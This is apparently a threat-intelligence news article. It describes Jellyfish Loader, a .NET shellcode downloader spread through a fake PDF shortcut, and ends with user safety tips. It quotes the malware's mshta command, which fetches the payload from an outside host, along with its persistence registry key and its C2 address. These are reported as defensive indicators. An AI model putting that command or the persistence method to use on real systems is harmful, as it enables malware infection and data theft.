A new threat, Jellyfish Loader, has been identified as a .NET-based shellcode downloader disguised as a Windows shortcut. Despite its unusual features suggesting it may still be in development, it is capable of deploying various other types of malware.
Jellyfish Loader Malware
Researchers from Cyble have identified a unique threat, Jellyfish Loader, originating from Poland. The malicious file is a zip archive with a PDF disguised as a Windows shortcut (.lnk). When opened, it downloads and runs a 64-bit .NET executable named BinSvc.exe, known as Jellyfish Loader.
This threat avoids obfuscation by using AsyncTaskMethodBuilder for asynchronous operations and efficiently validates SSL certificates for secure communication with its command server (C&C). It integrates dependencies via Fody and Costura, facilitating detection evasion. Once activated, the loader gathers system information for fingerprinting and includes a function for executing shellcode received from a remote server.
Here’s a closer look at the malware’s behavior: It infects systems through phishing or spear phishing. The threat appears as a double-extended zip archive named Lisa.pdf.zip, containing a similarly-named Lisa.pdf.lnk file. Opening this file triggers JavaScript that starts the payload download.
“C:\Windows\System32\mshta.exe” “http://file.compute-ec2-aws.com/0d9cb9fe-5714-433c-aa58-0f26675979f0”
The .lnk file uses junk data to evade detection and includes a decoy PDF with an image of a key and keychain, alongside the Jellyfish Loader payload.
Payload
Let’s focus on the actual payload located at C:\Users\user\AppData\Local\Microsoft\BinSvc.exe, which is the Jellyfish Loader. Downloaded by the script from the fake PDF, it sets persistence by creating a registry value.
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\LOAD
C:\Users\user\AppData\Local\Microsoft\BinSvc.exe
After launching, Jellyfish Loader gathers system fingerprint data, including runtime and build identifiers, program details, host and user names, domain, system architecture, OS version, and process ID. This information is saved in JSON format and encrypted with Base64.
Command and Control
The malware contacts its command and control (C2) server via an HTTP POST request to https://ping.connectivity-check.com. While the site appears legitimate, it has been used in previous malware campaigns, including the 2018 Olympic Destroyer operation.
This suggests that Jellyfish Loader, which shares similarities with the Olympic Destroyer in code and infrastructure, may be linked to potential attacks on the upcoming 2024 Paris Olympics.
Safety Recommendations:
- Be Cautious with Downloads: Avoid downloading and running files from unknown or untrusted sources. Always verify the legitimacy of files before opening them.
- Inspect File Extensions: Be wary of files with double extensions (e.g.,
filename.pdf.exe). Ensure that files are not disguised as something they are not. - Enable Security Features: Use built-in security features of your operating system, such as file extension visibility, to better identify suspicious files.
- Employ Security Software: Use reputable antivirus and anti-malware programs to scan files before executing them.
- Educate on Threats: Stay informed about the latest threats and security practices. Awareness is key to avoiding common attack vectors.
- Verify Sources: Ensure that files come from legitimate sources and check digital signatures or hashes when available.
- Keep Systems Updated: Regularly update your operating system and applications to protect against known vulnerabilities.
Leave A Comment